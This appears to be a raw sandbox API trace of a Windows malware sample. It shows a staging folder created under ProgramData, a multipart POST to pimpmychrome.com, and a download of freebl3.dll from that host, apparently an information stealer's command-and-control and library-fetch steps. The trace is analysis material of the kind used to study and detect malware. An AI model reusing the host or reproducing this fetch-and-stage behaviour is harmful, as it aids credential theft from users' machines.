[0125.662] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x5364560 [0125.662] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0125.662] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0125.662] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0125.662] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0125.662] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0125.662] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0125.662] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0125.662] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0125.662] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0125.662] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0125.662] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0125.662] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0125.662] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0125.662] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0125.662] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0125.662] LocalAlloc (uFlags=0x40, uBytes=0x4b) returned 0x5364170 [0125.662] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.662] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.663] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.663] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.663] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.663] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.663] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.663] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.663] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.663] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.663] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.663] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.663] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.663] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.663] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.663] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.663] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.663] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.663] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.663] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.663] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.663] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.663] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.663] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.663] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.663] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.663] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.663] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.663] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.664] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.665] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.665] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.665] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.665] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.665] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.665] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.665] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.665] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.665] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.665] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.665] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.665] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.665] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.665] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.665] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.665] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0125.665] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x5364578 [0125.665] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0125.665] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0125.665] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0125.665] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0125.666] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0125.666] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0125.666] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0125.666] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0125.666] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0125.666] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0125.666] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0125.666] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0125.666] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x5364590 [0125.666] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0125.666] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0125.666] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0125.666] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0125.666] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0125.666] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0125.666] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0125.666] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0125.666] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0125.666] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0125.783] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18d944 | out: lpSystemTimeAsFileTime=0x18d944*(dwLowDateTime=0xe25f9b80, dwHighDateTime=0x1d6d58a)) [0125.783] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x2) returned 0x6c912b8 [0125.783] GetTickCount () returned 0x1151324 [0125.783] GetLastError () returned 0x0 [0125.783] CreateDirectoryA (lpPathName="C:\\ProgramData\\4ZIDRNX9MN20P9GN70EIPOHE8" (normalized: "c:\\programdata\\4zidrnx9mn20p9gn70eipohe8"), lpSecurityAttributes=0x0) returned 1 [0125.784] SetCurrentDirectoryA (lpPathName="C:\\ProgramData\\4ZIDRNX9MN20P9GN70EIPOHE8" (normalized: "c:\\programdata\\4zidrnx9mn20p9gn70eipohe8")) returned 1 [0125.784] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x30) returned 0x6c912f0 [0125.784] CreateDirectoryA (lpPathName="C:\\ProgramData\\4ZIDRNX9MN20P9GN70EIPOHE8\\files" (normalized: "c:\\programdata\\4zidrnx9mn20p9gn70eipohe8\\files"), lpSecurityAttributes=0x0) returned 1 [0125.785] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c912f0 | out: hHeap=0x6c90000) returned 1 [0125.785] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x7a120) returned 0x51c0048 [0125.791] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x20) returned 0x6c912f0 [0125.791] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x20) returned 0x6c91318 [0125.791] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x20) returned 0x6c91340 [0125.791] GetLastError () returned 0x0 [0125.792] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0126.136] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x41, lpBuffer=0x18d800, dwBufferLength=0x4) returned 1 [0126.136] InternetConnectA (hInternet=0xcc0004, lpszServerName="pimpmychrome.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0126.137] InternetSetOptionA (hInternet=0xcc0008, dwOption=0x41, lpBuffer=0x1, dwBufferLength=0x0) returned 0 [0126.137] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/517", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400000, dwContext=0x1) returned 0xcc000c [0126.139] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x80) returned 0x6c91368 [0126.139] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1", dwHeadersLength=0x7d, dwModifiers=0x20000000) returned 1 [0126.139] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Language: ru-RU,ru;q=0.9,en;q=0.8", dwHeadersLength=0x28, dwModifiers=0x20000000) returned 1 [0126.139] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1", dwHeadersLength=0x32, dwModifiers=0x20000000) returned 1 [0126.139] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0", dwHeadersLength=0x37, dwModifiers=0x20000000) returned 1 [0126.139] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91368 | out: hHeap=0x6c90000) returned 1 [0126.139] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x30) returned 0x6c91368 [0126.139] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x47) returned 0x6c913a0 [0126.139] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91368 | out: hHeap=0x6c90000) returned 1 [0126.139] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A", dwHeadersLength=0x3f, dwModifiers=0x20000000) returned 1 [0126.139] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Content-Length: 25", dwHeadersLength=0x12, dwModifiers=0x20000000) returned 1 [0126.140] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x51c0048*, dwOptionalLength=0x19) returned 1 [0127.221] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x2e, lpBuffer=0x18d874, lpdwBufferLength=0x18d804, lpdwIndex=0x0 | out: lpBuffer=0x18d874, lpdwBufferLength=0x18d804, lpdwIndex=0x0) returned 0 [0127.221] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x7800) returned 0x6c929a8 [0127.222] InternetSetFilePointer (in: hFile=0xcc000c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0, dwContext=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0127.222] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c929a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d680 | out: lpBuffer=0x6c929a8*, lpdwNumberOfBytesRead=0x18d680*=0x16a) returned 1 [0127.225] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c92b12, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d680 | out: lpBuffer=0x6c92b12*, lpdwNumberOfBytesRead=0x18d680*=0x0) returned 1 [0127.226] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x1d, lpBuffer=0x18d6dc, lpdwBufferLength=0x18d680, lpdwIndex=0x0 | out: lpBuffer=0x18d6dc, lpdwBufferLength=0x18d680, lpdwIndex=0x0) returned 0 [0127.226] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0127.226] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c913a0 | out: hHeap=0x6c90000) returned 1 [0127.227] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0127.227] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0127.227] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91340 | out: hHeap=0x6c90000) returned 1 [0127.227] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91318 | out: hHeap=0x6c90000) returned 1 [0127.227] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c912f0 | out: hHeap=0x6c90000) returned 1 [0127.227] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x170) returned 0x6c912f0 [0127.227] GetLastError () returned 0x2f76 [0127.227] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0127.227] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x41, lpBuffer=0x18d94c, dwBufferLength=0x4) returned 1 [0127.227] InternetConnectA (hInternet=0xcc0004, lpszServerName="pimpmychrome.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0127.228] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/freebl3.dll", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400000, dwContext=0x1) returned 0xcc000c [0127.228] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x80) returned 0x6c91368 [0127.228] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1", dwHeadersLength=0x7d, dwModifiers=0x20000000) returned 1 [0127.228] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Language: ru-RU,ru;q=0.9,en;q=0.8", dwHeadersLength=0x28, dwModifiers=0x20000000) returned 1 [0127.228] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1", dwHeadersLength=0x32, dwModifiers=0x20000000) returned 1 [0127.228] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0", dwHeadersLength=0x37, dwModifiers=0x20000000) returned 1 [0127.228] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91368 | out: hHeap=0x6c90000) returned 1 [0127.228] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0127.291] InternetSetFilePointer (in: hFile=0xcc000c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0, dwContext=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.291] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c929a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c929a8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.292] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c92d90, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c92d90*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.303] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c93178, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c93178*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.303] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c93560, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c93560*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.303] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c93948, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c93948*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.303] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c93d30, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c93d30*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.303] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c94118, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c94118*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.303] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c94500, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c94500*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.303] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c948e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c948e8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.304] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c94cd0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c94cd0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.304] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c950b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c950b8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.304] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c954a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c954a0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.304] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c95888, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c95888*, 